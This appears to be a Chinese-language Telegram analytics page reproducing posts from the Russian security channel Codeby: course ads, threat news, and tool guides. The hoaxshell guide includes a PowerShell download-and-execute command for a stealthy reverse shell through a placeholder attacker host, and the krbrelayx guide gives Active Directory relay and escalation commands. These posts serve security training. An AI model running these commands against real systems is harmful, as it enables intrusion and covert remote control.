ch
Feedback
Codeby

Codeby

前往频道在 Telegram

Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina

显示更多

📈 Telegram 频道 Codeby 的分析概览

频道 Codeby (@codeby_sec) 俄语 语言赛道中的 是活跃参与者。目前社区聚集了 36 571 名订阅者,在 技术与应用 类别中位列第 3 756,并在 俄罗斯 地区排名第 17 798

📊 受众指标与增长动态

невідомо 创建以来,项目保持高速增长,吸引了 36 571 名订阅者。

根据 08 六月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 203,过去 24 小时变化为 9,整体触达仍然可观。

  • 认证状态: 未认证
  • 互动率 (ER): 平均受众互动率为 7.70%。内容发布后 24 小时内通常能获得 4.22% 的反应,占订阅者总量。
  • 帖子覆盖: 每篇帖子平均可获得 2 817 次浏览,首日通常累积 1 545 次浏览。
  • 互动与反馈: 受众积极参与,单帖平均反应数为 19
  • 主题关注点: 内容集中在 edr, api, вектор, mitre, att&ck 等核心主题上。

📝 描述与内容策略

作者将该频道定位为表达主观观点的平台:
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina

凭借高频更新(最新数据采集于 09 六月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。

36 571
订阅者
+924 小时
+177
+20330
帖子存档
Codeby
36 571
Repost from CyberCamp
Продолжаем мотивировать вас на обучение! 🧑‍💻 Академия Кодебай поделилась уроками для CyberCamp2025 на темы: 😎 Реагирование
Продолжаем мотивировать вас на обучение! 🧑‍💻 Академия Кодебай поделилась уроками для CyberCamp2025 на темы: 😎 Реагирование на компьютерные инциденты Рассмотрим 4 этапа реагирования: подготовка, обнаружение, анализ и сдерживание. В рамках каждого этапа представлено описание процессов, технологий и возможных артефактов при проведении криминалистического анализа, а также перечень мероприятий, проводимых после инцидента. 😎 Пентест инфраструктуры Active Directory Изучим основные элементы пентеста: уязвимые конфигурации списков доступа, получение первоначального доступа и сохранение доступа к системе. Вся практическая часть представлена в виде наглядных видео-уроков 👨‍💻 😎 OSINT: технология боевой разведки Проанализируем виды идентификаторов в открытых источниках: электронная почта, никнейм, профили в социальных сетях, и даже IP-адрес 👻 ©️ Регистрация l 😺 Чат

Codeby
36 571
А вы знали что... 🔸85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024) 🔸Каждое 3-е приложение в Goo
А вы знали что... 🔸85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024) 🔸Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies). 🔸Хакерские атаки на Android выросли на 50% за последние 2 года (данные Kaspersky Lab). Знание этих рисков – первый шаг к безопасности. Второй – освоить инструменты, которые помогут их устранить. Стартуем 20 октября! 👩‍💻 🔴Записаться Рассмотрим устройство приложений под ОС Android, этапы создания мобильного приложения, приемы реверса и изменения кода. Подробно изучим поиск и эксплуатацию уязвимостей. Курс создан для: 🌟 Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений 🚀 По всем вопросам пишите @CodebyManagerBot

Codeby
36 571
Readpe: Мастер-инспектор для PE-файлов под Linux Readpe — это дизассемблер и анализатор PE-файлов. Его ключевое преимущество
Readpe: Мастер-инспектор для PE-файлов под Linux
Readpe — это дизассемблер и анализатор PE-файлов. Его ключевое преимущество — кроссплатформенность. Многие аналогичные инструменты заточены под Windows, а readpe компилируется и работает в средах Linux, что делает его незаменимым в арсенале специалистов, которые предпочитают или вынуждены проводить анализ на Unix-подобных системах.
Чем Readpe отличается от других утилит (например, от стандартного objdump)? - Инструмент сфокусирован исключительно на формате PE. Он предоставляет информацию обо всех критически важных частях файла: заголовках DOS и PE, секциях, таблице импорта и экспорта, ресурсах, отладочной информации и сертификатах. - Инструмент выводит информацию в отформатированном виде, что значительно ускоряет ее восприятие и анализ по сравнению. - Readpe может дизассемблировать секции кода, преобразуя машинные инструкции в читаемый ассемблерный код. ▶️Устанавливаем
git clone https://github.com/mentebinaria/readpe.git
cd readpe
sudo make install
echo "/usr/local/lib" | sudo tee /etc/ld.so.conf.d/libpe.conf
sudo ldconfig
▶️Проверяем
readpe --h
▶️Общая информация о файле Ключ -H выводит сводную информацию из заголовков
readpe -H notepad.exe
Вывод покажет архитектуру (
x86/x64
), точку входа, характеристики файла, размеры секций и другую метаинформацию.
▶️ Анализ таблицы импорта Одна из самых востребованных функций. Какие внешние библиотеки и функции использует программа?
readpe -i notepad.exe
Вы увидите список всех импортированных
DLL
(например,
KERNEL32.DLL, USER32.DLL, GDI32.DLL
) и конкретных функций из них (
CreateFile, MessageBox, GetSystemTime и т.д.
). Это мгновенно дает понимание о потенциальных возможностях анализируемого файла.
▶️Просмотр секций Ключ -S отображает все секции файла (.text, .data, .rdata, .rsrc и др.).
readpe -S notepad.exe
В выводе вы найдете имена секций, их виртуальные и физические размеры, атрибуты доступа. Это важно для оценки, например, наличия нестандартных или исполняемых секций с атрибутом на запись — частый признак уязвимости или зловредной техники.

Codeby
36 571
Разбор уязвимостей на доске! Твоя задача — вычислить CVSS, как настоящий аналитик. Пиши свой расчёт и аргументы в комментария
+3
Разбор уязвимостей на доске! Твоя задача — вычислить CVSS, как настоящий аналитик. Пиши свой расчёт и аргументы в комментариях — будем считать вместе 🧮

Codeby
36 571
🚩 Новые задания на платформе HackerLab! 🔎 Категория OSINT — Канатная дорога 🌍 Категория Веб — Nova Arts Приятного хакинга!
🚩 Новые задания на платформе HackerLab! 🔎 Категория OSINTКанатная дорога 🌍 Категория ВебNova Arts Приятного хакинга!

Codeby
36 571
📚 Работа и учёба отлично совмещаются на оплачиваемой стажировке GPB.Level Up: Кибербезопасность! Здесь гибкий график от 30 ч
📚 Работа и учёба отлично совмещаются на оплачиваемой стажировке GPB.Level Up: Кибербезопасность! Здесь гибкий график от 30 часов в неделю и удобные форматы: очно или гибридно в зависимости от направления. GPB.Level Up: Кибербезопасность стажировка в области информационной безопасности в Газпромбанке для старшекурсников, выпускников и начинающих специалистов. Вот и другие преимущества: — зарплата 80 000 рублей со старта (gross при работе 40 часов в неделю) — поддержка от опытных наставников и экспертов информационной безопасности — доступ к 800+ курсам для развития soft и hard skills, Skillbox, Lerna и другим платформам — перспективы для карьеры: более 90% участников GPB.Level Up: Кибербезопасность прошлого сезона остались работать в банке Время показать свои таланты, жми на кнопку! https://vk.cc/cQ15t4?erid=2W5zFJ4r7Ct

Codeby
36 571
Гайд по восстановлению данных: метаданные, карвинг и работа с образами. 🪵Удалили файл и тут же об этом пожалели? Не всё поте
Гайд по восстановлению данных: метаданные, карвинг и работа с образами. 🪵Удалили файл и тут же об этом пожалели? Не всё потеряно. В нашей новой статье разбираем, что на самом деле происходит с данными после удаления и как их можно вернуть. Рассказываем простыми словами о сложных вещах: 🔵Как правильно создать образ сбойного диска утилитой ddrescue 🔵Как попытаться восстановить файлы с именами и папками 🔵Что такое файловый карвинг и когда он — последняя надежда 🔵Почему для SSD и флешек эти инструкции могут не сработать. 📎Лучший способ не потерять данные — быть готовым к их восстановлению. Сохраняйте подробный гайд и действуйте на опережение!

Codeby
36 571
krbrelayx — Набор инструментов для атак на Kerberos и NTLM в Active Directory krbrelayx — это мощный набор Python-утилит для
krbrelayx — Набор инструментов для атак на Kerberos и NTLM в Active Directory
krbrelayx — это мощный набор Python-утилит для тестирования безопасности инфраструктуры Active Directory, в частности Kerberos и NTLM-аутентификации. Инструмент позволяет исследовать и эксплуатировать уязвимости, связанные с relay-атаками (Kerberos relay, LDAP relay).
🪛 Основные возможности krbrelayx ➡️ Kerberos Relay Attacks — реализация атак по принципу NTLM relay, но с использованием Kerberos (через S4U2Proxy/S4U2Self). ➡️ LDAP и LDAPS Relay — получение привилегий и добавление аккаунтов через перехваченные тикеты. ➡️ Resource-based Constrained Delegation (RBCD) exploitation — автоматизация добавления себя в делегирование и эскалация прав до Domain Admin. ➡️ Поддержка различных сервисов: LDAP, SMB, HTTP, MSSQL и др. ➡️ Интеграция с другими инструментами: можно использовать вместе с impacket, ntlmrelayx, getST.py и adidnsdump. ➡️ Тонкая настройка сценариев: выбор цели, фильтров LDAP, а также логирование и отладка запросов Kerberos. ⬇️ Установка и запуск Клонируйте репозиторий:
git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx
pip install -r requirements.txt
Для запуска, например, LDAP-релея:
python3 krbrelayx.py --target ldap://dc01.corp.local --escalate-user attacker
Можно использовать с различными параметрами для указания SPN, делегирования и типов тикетов (TGS, TGT). Пример для атаки через Kerberos:
python3 krbrelayx.py -t ldap://dc.corp.local --delegate-from victim$ --delegate-to target$ --add-computer attacker$
⚙️ Преимущества krbrelayx ⏺️ Позволяет исследовать реальные Kerberos relay-уязвимости без необходимости ручного построения пакетов. ⏺️ Поддерживает комплексные сценарии атак на делегирование (RBCD, unconstrained и constrained). ⏺️ Совместим с современными версиями Windows Server и Active Directory.

Codeby
36 571
🇨🇳 Китайские хакеры используют Zero-day в VMware! 📞 Связанные с Китаем хакеры используют новую уязвимость нулевого дня VMw
🇨🇳 Китайские хакеры используют Zero-day в VMware! 📞 Связанные с Китаем хакеры используют новую уязвимость нулевого дня VMware с октября 2024 года. По данным NVISO Labs , недавно исправленная уязвимость безопасности, затрагивающая Broadcom VMware Tools и VMware Aria Operations, эксплуатировалась как уязвимость нулевого дня с середины октября 2024 года злоумышленником под именем UNC5174. ❗️ Злоумышленники используют уязвимость CVE-2025-41244 с оценкой CVSS: 7,8, эксплуатируя локальную ошибку повышения привилегий в функции get_version(). Затрагиваются такие продукты, как VMware Cloud Foundation, VMware vSphere Foundation, VMware Aria Operations, VMware Telco Cloud Platform и VMware Telco Cloud Infrastructure. 🔎 Исследователь NVISO Максим Тибо обнаружил уязвимость и сообщил о ней 19 мая 2025 года. Компания также заявила, что VMware Tools 12.4.9, входящий в состав VMware Tools 12.5.4, устраняет эту проблему в 32-разрядных системах Windows, а версия open-vm-tools, устраняющая CVE-2025-41244, будет распространяться поставщиками Linux. 💻 По данным NVISO, уязвимость коренится в функции под названием «get_version()», которая принимает шаблон регулярного выражения (regex) в качестве входных данных для каждого процесса с прослушивающим сокетом, проверяет, соответствует ли двоичный файл, связанный с этим процессом, шаблону, и, если соответствует, вызывает команду версии поддерживаемой службы. 💻 Как утверждает эксперт, широкая практика имитации системных двоичных файлов (например, httpd) подчеркивает реальную возможность того, что несколько других видов вредоносного ПО в течение многих лет случайно извлекали выгоду из непреднамеренного повышения привилегий ❗️ Так что, если используете в своих инфраструктурах продукты VMware, то будьте внимательны!

Codeby
36 571
Киберпреступления оставляют цифровые следы. Научитесь их находить. Цифровой криминалист — это тот, кто расследует атаки, восс
Киберпреступления оставляют цифровые следы. Научитесь их находить. Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее. Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Старт курса 13 октября! ⌨️ Регистрация здесь Что вас ждёт на курсе: 🟧 Реальные кейсы, основанные на APT-отчетах 🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов 🟧 Поиск и анализ артефактов хакеров и вредоносного ПО Кому подходит курс: 🟧 Аналитикам 1, 2, 3 линии SOC 🟧 Начинающим специалистам в DFIR и Red Team 🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику Хотите научиться расследовать кибератаки и распутывать цифровые следы? Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас 🚀 @CodebyManagerBot

Codeby
36 571
Обход защиты с помощью hoaxshell: HTTP-канал для скрытного управления Windows Специалисты по кибербезопасности традиционно ра
Обход защиты с помощью hoaxshell: HTTP-канал для скрытного управления Windows
Специалисты по кибербезопасности традиционно разделяют инструменты для тестирования на проникновение на два типа: мощные, но сложные, или простые, но ограниченные. Hoaxshell — инструмент, который ломает стереотип. Скрипт использует нестандартный подход к работе с PowerShell, превращая его в эффективное средство для моделирования угроз и оценки защищённости инфраструктуры.
📌 Уникальность Hoaxshell Традиционные методы получения обратного соединения (reverse shell) через PowerShell часто сталкиваются с проблемами: встроенные защитные механизмы Windows (AMSI), системы обнаружения вторжений (IDS) и межсетевые экраны легко распознают и блокируют стандартные шаблоны трафика. Hoaxshell обходит эти препятствия за счет двух ключевых особенностей: - В отличие от сырых TCP-сокетов, hoaxshell использует HTTP/S-запросы для коммуникации. Это позволяет ему маскировать свой трафик под легитимную активность веб-браузера или другого приложения, что значительно усложняет его обнаружение. - Инструмент генерирует команды PowerShell, которые не содержат явных признаков вредоносной активности. Эти команды динамически получают инструкции от сервера, что позволяет обходить статические сигнатуры антивирусов. ⬇️Установка
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
⬇️Проверка
hoaxshell -h
Запуск сервера Серверная часть hoaxshell запускается на машине тестировщика (атакующего). Самый простой способ — запустить его на всех интерфейсах, указав порт.
sudo python3 hoaxshell.py -s 8080
После запуска скрипт сгенерирует уникальную команду PowerShell, которую необходимо выполнить на целевой машине. Это будет выглядеть примерно так:
PS C:\> $s='http://ВАШ_IP:8080'; $i='UNIQUE_SESSION_ID'; $p='http://proxy-server.com:8080'; iex (New-Object Net.WebClient).DownloadString("$s/index.html")
Вариации для обхода защиты Для шифрования трафика и лучшей маскировки можно использовать встроенный сервер с SSL.
sudo python3 hoaxshell.py -s 443 -t ssl
В этом случае команда для цели будет использовать
https://
. Если целевая машина использует корпоративный прокси, в команду можно добавить соответствующие параметры.
📌 Меры защиты от инструментов типа hoaxshell - Мониторинг сетевой активности (выявление регулярных HTTP/S-сессий между внутренними хостами и внешними IP) - Аудит журналов PowerShell (контроль событий выполнения внешнего кода (например, через DownloadString)) - Ограничение возможностей PowerShell (использование Constrained Language Mode для блокировки выполнения скриптов) - Сегментация сети (блокировка несанкционированных исходящих HTTP/S-подключений с рабочих станций)

Codeby
36 571
📱 Банковский Android-троян атакует пожилых людей! 👨‍🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сг
📱 Банковский Android-троян атакует пожилых людей! 👨‍🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сгенерированные искусственным интеллектом события путешествий в Facebook. Исследователи выявили ранее не выявленный банковский троян для Android под названием Datzbro , который может осуществлять атаки по захвату устройств ( DTO ) и совершать мошеннические транзакции, наживаясь на пожилых людях. 🌐 Компания ThreatFabric заявила, что обнаружила эту вредоносную активность в августе 2025 года после того, как пользователи в Австралии сообщили о мошенниках, управляющих группами в Facebook, рекламирующими «активные поездки для пожилых людей». Среди других территорий, на которые нацелились злоумышленники, — Сингапур, Малайзия, Канада, ЮАР и Великобритания. 📱 Действовали злоумышленники следующим образом: создавали тематические сообщества в Facebook, в которых генерировался контент с помощью ИИ, далее пожилые люди, которые ищут возможности для общения и путешествия, обращались к ним за услугами. После чего с ними связываются через Facebook или WhatsApp, где их просят загрузить APK-файл по вредоносной ссылке (например, «download.seniorgroupapps[.]com»), утверждая, что это позволит им зарегистрироваться на мероприятии, общаться с участниками и отслеживать запланированные мероприятия. 📵 Ниже приведен список вредоносных приложений Android, которые были обнаружены в процессе распространения Datzbro:
Senior Group (twzlibwr.rlrkvsdw.bcfwgozi) Живые годы (orgLivelyYears.browses646) ActiveSenior (com.forest481.security) DanceWave (inedpnok.kfxuvnie.mggfqzhl) 作业帮 (io.mobile.Itool) 麻豆传媒 (fsxhibqhbh.hlyzqkd.aois 麻豆传媒 (mobi.audio.aassistant) 谷歌浏览器 (tvmhnrvsp.zltixkpp.mdok) MT管理器 (varuhphk.vadneozj.tltldo) MT管理器 (spvojpr.bkkhxobj.twfwf) 大麦 (mnamrdrefa.edldylo.zish) MT管理器 (io.red.studio.tracker)
⚠️ На данный момент подобные атаки еще на зафиксированы на территории России, но, по возможности, лучше предостеречь своих близких!

Codeby
36 571
📱 Банковский Android-троян атакует пожилых людей! 👨‍🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сг
📱 Банковский Android-троян атакует пожилых людей! 👨‍🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сгенерированные искусственным интеллектом события путешествий в Facebook. Исследователи выявили ранее не выявленный банковский троян для Android под названием Datzbro , который может осуществлять атаки по захвату устройств ( DTO ) и совершать мошеннические транзакции, наживаясь на пожилых людях. 🌐 Компания ThreatFabric заявила, что обнаружила эту вредоносную активность в августе 2025 года после того, как пользователи в Австралии сообщили о мошенниках, управляющих группами в Facebook, рекламирующими «активные поездки для пожилых людей». Среди других территорий, на которые нацелились злоумышленники, — Сингапур, Малайзия, Канада, ЮАР и Великобритания. 📱 Действовали злоумышленники следующим образом: создавали тематические сообщества в Facebook, в которых генерировался контент с помощью ИИ, далее пожилые люди, которые ищут возможности для общения и путешествия, обращались к ним за услугами. После чего с ними связываются через Facebook или WhatsApp, где их просят загрузить APK-файл по вредоносной ссылке (например, «download.seniorgroupapps[.]com»), утверждая, что это позволит им зарегистрироваться на мероприятии, общаться с участниками и отслеживать запланированные мероприятия. 📵 Ниже приведен список вредоносных приложений Android, которые были обнаружены в процессе распространения Datzbro: ⚠️ На данный момент подобные атаки еще на зафиксированы на территории России, но, по возможности, лучше предостеречь своих близких!

Codeby
36 571
Repost from Hacker Lab
🛠 Мощь и беспомощность пакера UPX В новой статье мы подробно разбираем UPX - один из самых популярных упаковщиков исполняемы
🛠 Мощь и беспомощность пакера UPX В новой статье мы подробно разбираем UPX - один из самых популярных упаковщиков исполняемых файлов. Это подробный гайд для тех, кто хочет понять, как работает UPX, и научиться распаковывать файлы вручную. Внутри вас ждет: 🔵Принцип работы UPX. Как упаковщик перестраивает PE-файл и какие изменения вносит в его структуру. 🔵UPX-заголовок. Объяснение структуры заголовка и почему его повреждение делает автоматическую распаковку невозможной. 🔵Ручная распаковка. Пошаговая инструкция по восстановлению Original Entry-Point (OEP) и Import Address Table (IAT) для корректного запуска файла. 📌 Читать статью #upx #reverse #infosec

Codeby
36 571
➡️ Что такое STIX и TAXII? ❓ Данные термины в киберразведке используются часто вместе, но что это такое и зачем они нужны? 🔺
➡️ Что такое STIX и TAXII? ❓ Данные термины в киберразведке используются часто вместе, но что это такое и зачем они нужны? 🔺 STIX (Structured Threat Information eXpression) — это стандартный язык для структурированного описания и обмена информацией о киберугрозах. Он предоставляет общую структуру для представления данных об индикаторах компрометации, тактиках, техниках и процедурах угроз, а также участников угроз. Это позволяет организациям более эффективно обмениваться и анализировать разведывательную информацию для улучшения защиты и реагирования на инциденты 🔺 TAXII (Trusted Automated eXchange of Intelligence Information) — это протокол и набор сервисов, который обеспечивает стандартизованный и автоматизированный обмен информацией, представленной в формате STIX, между организациями. TAXII использует HTTPS и RESTful API для передачи данных, обеспечивает обнаружение, управление коллекциями данных и поддерживает различные модели обмена. Это позволяет организациям надежно и эффективно обмениваться актуальной информацией об угрозах в автоматическом режиме. 👀 Получается, что STIX отвечает за структуру и формат описания угроз, а TAXII - за способ передачи информации об угрозах. Именно поэтому они используются совместно для улучшения обмена информации об угрозах. Но как это все выглядит на практике? Пример STIX:
{
  "type": "bundle",
  "id": "bundle--12345678-1234-1234-1234-123456789abc",
  "objects": [
    {
      "type": "indicator",
      "id": "indicator--abcd1234-5678-90ef-ghij-klmnopqrstuv",
      "created": "2025-09-30T12:00:00Z",
      "modified": "2025-09-30T12:00:00Z",
      "name": "Malicious IP Address",
      "description": "Known IP address associated with malware command and control",
      "pattern": "[ipv4-addr:value = '192.0.2.1']",
      "pattern_type": "stix",
      "valid_from": "2025-09-01T00:00:00Z"
    }
  ]
}
Этот пример описывает "индикатор" — IP-адрес 192.0.2.1, который ассоциируется с вредоносной активностью. В STIX используются объекты с типами, например "indicator", а также указывается паттерн (pattern) для обозначения конкретного признака угрозы.

Codeby
36 571
🤖 ИИ внедряется в работу SOC 📊 Исходя из недавнего исследования Prophet Security, традиционная модель работы SOC уже не выд
🤖 ИИ внедряется в работу SOC 📊 Исходя из недавнего исследования Prophet Security, традиционная модель работы SOC уже не выдерживает наплыва работы, накапливая большие объемы оповещения, замедляя расследования и увеличивая стоимость перегруженных команд SOC-аналитиков. 🗣 Опрос проходил среди 282 руководителей служб безопасности компаний из разных отраслей, раскрывая суровую реальность, с которой сталкиваются современные центры безопасности, которые уже не могут скрывать такие серьезные проблемы, как пропуск критических угроз. 📈 В связи с чем компании стали активно внедрять ИИ в работу своих SOC команд. Таким образом ИИ переходит от эксперимента к стратегическому приоритету. 🤖 В настоящее время 55% служб безопасности уже используют ИИ, как ассистента в рабочих процессах для поддержки сортировки оповещений и проведения расследований. 📈 Следующая волна внедрения стремительно приближается. Среди команд, ещё не использующих ИИ, 60% планируют оценить решения SOC на базе ИИ в течение года. Согласно опросу, ожидается, что в ближайшие три года 60% всех рабочих нагрузок SOC будут обрабатываться с помощью ИИ. ⌛️ В качестве метрик успешности внедрения ИИ организации планируют оценивать прогресс по сокращению среднего времени расследования (MTTI) и среднего времени реагирования (MTTR), а также по традиционным показателям закрытия оповещений.

Codeby
36 571
RDWAtool: Аудит и анализ контроллеров домена Active Directory RDWAtool (Remote Directory Writable Attributes Tool) — утилита,
RDWAtool: Аудит и анализ контроллеров домена Active Directory
RDWAtool (Remote Directory Writable Attributes Tool) — утилита, разработанная французским исследователем безопасности p0dalirius. Задача — автоматизировать процесс аудита прав доступа к атрибутам объектов в Active Directory.
Инструмент подключается к контроллеру домена и проверяет, к каким атрибутам (номеру телефона, описанию должности, почтовому адресу) пользователь или компьютер имеют права на запись. Это позволяет быстро ответить на вопросы: 🟧Какие данные в домене я могу изменить? 🟧Не являются ли эти права избыточными и не создают ли они угрозу для безопасности? 🟧Какие атрибуты могут быть использованы злоумышленником для эскалации привилегий или перемещения по сети? 🟧Клонируем репозиторий
git clone https://github.com/p0dalirius/RDWAtool.git
🟧Переходим в директорию с инструментом
cd RDWAtool
🟧Устанавливаем необходимые Python-библиотеки
pip3 install -r requirements.txt
🟧Проверяем
RDWAtool -h
🟧Минимальная команда для запуска требует указания учетных данных пользователя домена и целевого контроллера домена (DC)
python3 rdwatool.py -u 'DOMAIN\Username' -p 'Password' -d 'dc.domain.local'
Где: -u / --username - имя пользователя в формате DOMAIN\Username -p / --password - пароль пользователя -d / --domain - DNS-имя или IP-адрес контроллера домена.
После выполнения команды
RDWAtool
начнет сканирование, выводя в реальном времени список объектов
AD
и записываемых для них атрибутов.
🟧Сканировать только пользователей
python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --users
🟧Сканировать только компьютеры
python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --computers
🟧RDWAtool применяется в различных сценариях 🟧Red Team - выявляет векторы для эскалации привилегий через записываемые атрибуты для атак (Key Credential Attack, Golden Tickets). 🟧Blue Team - обнаруживает избыточные права в AD для соблюдения Principle of Least Privilege и устранения векторов атак. 🟧Администраторы - анализирует права на запись атрибутов для расследования инцидентов и планирования изменений.

Codeby
36 571
Устроиться специалистом по информационной безопасности в Яндекс за несколько дней Для этого есть отличная возможность: мы при
Устроиться специалистом по информационной безопасности в Яндекс за несколько дней Для этого есть отличная возможность: мы приглашаем специалистов с опытом от 2 лет на Week Offer Security 11–17 октября. Всего за неделю вы сможете пройти все собеседования и получить офер в Яндекс. Как это устроено: 🔸 Регистрируйтесь и отправляйте заявку до 8 октября 🔸 Пройдите две технические секции 11–12 октября 🔸 Познакомьтесь с командами и получите офер 13–17 октября Для регистрации переходите по ссылке. Удачи!

Codeby
36 571
📱 Компания Discord опубликовала заявление с подробным разъяснением инцидента безопасности, который произошел с одним из ее с
📱 Компания Discord опубликовала заявление с подробным разъяснением инцидента безопасности, который произошел с одним из ее сторонних поставщиков услуг по обслуживанию клиентов. В отличие от взлома систем самого Discord, инцидент стал результатом целенаправленной атаки на сотрудника третьей стороны. 🔺Хронология инцидента Инцидент берет начало не с технического взлома, а с многоэтапной атаки методом социальной инженерии. Злоумышленники, используя методы манипуляции, смогли обманом получить доступ к учетной записи одного из сотрудников сторонней службы поддержки. Это произошло до 5 мая 2023 года, когда команде безопасности Discord официально стало известно о произошедшем. После компрометации учетной записи злоумышленник получил доступ к тем данным, которые обрабатываются в тикетах службы поддержки. Это означает, что был раскрыт ограниченный объем информации, включающий адреса электронной почты пользователей, обращавшихся в поддержку, содержание их сообщений к операторам, а также любые документы, прикрепленные к этим обращениям.
🔺Важно подчеркнуть, что внутренние системы Discord и основные данные аккаунтов не были затронуты. Расследование не выявило никаких признаков того, что злоумышленник получил доступ к паролям, платежной информации или к личным сообщениям, которыми пользователи обмениваются в дружеских беседах и на серверах.
🔺Реакция и предпринятые меры Узнав об инциденте, Discord немедленно приступил к серии действий по устранению угрозы и минимизации последствий. 🟣Первым действием стала полная блокировка скомпрометированной учетной записи сотрудника сторонней службы поддержки для предотвращения дальнейшего несанкционированного доступа. 🟣В срочном порядке обслуживание клиентов было переведено на нового поставщика услуг для обеспечения непрерывности работы. 🟣Была запущена целевая рассылка всем пользователям, чьи данные могли быть затронуты инцидентом. Каждому такому пользователю было направлено персональное сообщение с описанием ситуации и рекомендацией проявлять повышенную бдительность к фишинговым письмам, которые могут прийти на адрес электронной почты, указанный в обращении в поддержку. 🟣Компания инициировала работу по усилению систем безопасности и пересмотру процессов взаимодействия с третьими сторонами для предотвращения подобных инцидентов в будущем.
В своем заявлении компания принесла извинения за произошедшее и заверила, что продолжает укреплять как собственные системы безопасности, так и требования к сторонним партнерам, чтобы не допустить подобных инцидентов в будущем.
💬А что думаете вы о данном инциденте?

Codeby
36 571
Nuclei: Автоматизация безопасности через шаблоны Nuclei — инструмент командной строки с открытым исходным кодом для масштабир
Nuclei: Автоматизация безопасности через шаблоны
Nuclei — инструмент командной строки с открытым исходным кодом для масштабируемого сканирования безопасности на основе шаблонов. Принцип работы основан на использовании централизованной базы шаблонов (формат YAML). Каждый шаблон содержит инструкции для проверки одной конкретной уязвимости, небезопасной конфигурации или технологии.
Преимущества - Шаблоны позволяют минимизировать ложные срабатывания за счет точного описания условий обнаружения - Сообщество безопасности регулярно создает и обновляет шаблоны для новых уязвимостей - Поддерживает проверки HTTP, DNS, TCP и рабочих процессов ✨Устанавливаем
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
nuclei -update-templates
Проверяем
nuclei -h

Сканируем
nuclei -u example.com -severity critical,high
nuclei -list targets.txt -o results.json -json
🟣Для проверки цели на конкретную уязвимость (например, Log4Shell (CVE-2021-44228)), укажем путь к конкретному шаблону:
nuclei -u https://example.com -t /path/to/nuclei-templates/cves/2021/CVE-2021-44228.yaml
Получаем такой результат:
[CVE-2021-44228] @ https://example.com/api/login
[info] The target is vulnerable to Log4Shell (CVE-2021-44228).
[template] cves/2021/CVE-2021-44228.yaml
[severity] critical
📎Полезные команды Объединение с subfinder и httpx
echo "domain.com" | subfinder | httpx | nuclei -silent
Оптимизация скорости
nuclei -list targets.txt -rate-limit 50 -concurrency 10
Лимиты для избежания блокировок
nuclei -u example.com -rate-limit 10 -timeout 20
Недостатки - Высокая нагрузка на сеть при агрессивном сканировании - Риск блокировки IPS/WAF системами при отсутствии настройки лимитов